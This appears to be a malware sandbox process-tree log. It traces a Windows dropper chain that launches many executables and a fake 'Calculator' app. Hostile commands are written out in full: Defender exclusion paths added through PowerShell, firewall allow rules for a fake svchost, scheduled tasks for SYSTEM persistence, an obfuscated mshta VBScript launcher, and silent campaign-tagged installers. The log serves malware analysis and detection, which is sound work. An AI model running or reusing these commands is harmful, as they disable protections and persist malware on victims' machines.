C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffcbb22dec0,0x7ffcbb22ded0,0x7ffcbb22dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7cb799e70,0x7ff7cb799e80,0x7ff7cb799e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,9753090863115678352,9333774829379292461,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15744_1443807735" --mojo-platform-channel-handle=1704 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FA802.tmp\mt1GBIsJD_LSfQtJhR6C12ul.tmp"C:\Users\Admin\AppData\Local\Temp\is-FA802.tmp\mt1GBIsJD_LSfQtJhR6C12ul.tmp" /SL5="$80430,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-RTJJI.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-RTJJI.tmp\lakazet.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\4c-e4ab5-ed4-ea9b0-8f9f899edcd19\Gyjegahogu.exe"C:\Users\Admin\AppData\Local\Temp\4c-e4ab5-ed4-ea9b0-8f9f899edcd19\Gyjegahogu.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exeC:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exeC:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe"C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe" -u14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yiug0m2q.0jx\autosubplayer.exe /S & exit12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\uNllGlcbm2GVjpyTbg93jDn7.exe"C:\Users\Admin\Pictures\Adobe Films\uNllGlcbm2GVjpyTbg93jDn7.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
- Executes dropped EXE
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Users\Admin\Pictures\Adobe Films\PQBJTAaQtTewucBijOxkjY_l.exe"C:\Users\Admin\Pictures\Adobe Films\PQBJTAaQtTewucBijOxkjY_l.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\B9fyo7QqeK801elsQ3zzApZx.exe"C:\Users\Admin\Pictures\Adobe Films\B9fyo7QqeK801elsQ3zzApZx.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\7o86wFKJyInJIOUE8xaT8jW5.exe"C:\Users\Admin\Pictures\Adobe Films\7o86wFKJyInJIOUE8xaT8jW5.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 2727⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\rGwY69WmOM_qqsBGjBQCwu70.exe"C:\Users\Admin\Pictures\Adobe Films\rGwY69WmOM_qqsBGjBQCwu70.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\I43HlxEfzYdBanh5sTg7Y_zX.exe"C:\Users\Admin\Pictures\Adobe Films\I43HlxEfzYdBanh5sTg7Y_zX.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 2727⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\UiCHUYf2DCZO0cVtFmpt1M5s.exe"C:\Users\Admin\Pictures\Adobe Films\UiCHUYf2DCZO0cVtFmpt1M5s.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\9osAN_jHjbdtS1wgTHVWBnwP.exe"C:\Users\Admin\Pictures\Adobe Films\9osAN_jHjbdtS1wgTHVWBnwP.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4999053.exe"C:\Users\Admin\AppData\Roaming\4999053.exe"7⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 4489⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4421256.exe"C:\Users\Admin\AppData\Roaming\4421256.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8069537.exe"C:\Users\Admin\AppData\Roaming\8069537.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5011017.exe"C:\Users\Admin\AppData\Roaming\5011017.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2325315.exe"C:\Users\Admin\AppData\Roaming\2325315.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3364777.exe"C:\Users\Admin\AppData\Roaming\3364777.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\3364777.exe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\3364777.exe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\3364777.exe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\3364777.exe" ) do taskkill /F /IM "%~nXm"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "3364777.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\5061526.exe"C:\Users\Admin\AppData\Roaming\5061526.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Xf_zx9O1XjyURUhCmLjojbZL.exe"C:\Users\Admin\Pictures\Adobe Films\Xf_zx9O1XjyURUhCmLjojbZL.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 5607⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\UeuBMbC_JvHWFwRUeq1Z4yhO.exe"C:\Users\Admin\Pictures\Adobe Films\UeuBMbC_JvHWFwRUeq1Z4yhO.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\vrDet9OfjstR25razE2Nylyc.exe"C:\Users\Admin\Pictures\Adobe Films\vrDet9OfjstR25razE2Nylyc.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ey4uvXWEOUalkU_eykdaluyu.exe"C:\Users\Admin\Pictures\Adobe Films\ey4uvXWEOUalkU_eykdaluyu.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6564 -s 16807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DRRE8.tmp\kwpQoqQ0RdrnOPfE49tQ0tRM.tmp"C:\Users\Admin\AppData\Local\Temp\is-DRRE8.tmp\kwpQoqQ0RdrnOPfE49tQ0tRM.tmp" /SL5="$10334,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-ERGV2.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-ERGV2.tmp\lakazet.exe" /S /UID=27098⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\e2-aa5ba-d6f-032b4-3e82b65a16446\Sylaezhaetelo.exe"C:\Users\Admin\AppData\Local\Temp\e2-aa5ba-d6f-032b4-3e82b65a16446\Sylaezhaetelo.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xa0,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Users\Admin\AppData\Local\Temp\b4-639c8-9a8-b77be-987e4d6fd2ba1\Pogodybaely.exe"C:\Users\Admin\AppData\Local\Temp\b4-639c8-9a8-b77be-987e4d6fd2ba1\Pogodybaely.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exeC:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exeC:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe"C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe" -u12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe" & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f14⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aoz0k4r3.zc2\autosubplayer.exe /S & exit10⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exeC:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe /qn CAMPAIGN=65411⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636565878 /qn CAMPAIGN=654 " CAMPAIGN="654"12⤵
- Enumerates connected drives
-
C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe"C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe" /VERYSILENT9⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Pictures\Adobe Films\Sg5zNg8pvLcFbf509SrSiImk.exe"C:\Users\Admin\Pictures\Adobe Films\Sg5zNg8pvLcFbf509SrSiImk.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"8⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ffcbb22dec0,0x7ffcbb22ded0,0x7ffcbb22dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1608 /prefetch:29⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1760 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2400 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2180 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2524 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2492 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:29⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=3680 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2636 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1560 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1480 /prefetch:89⤵
-
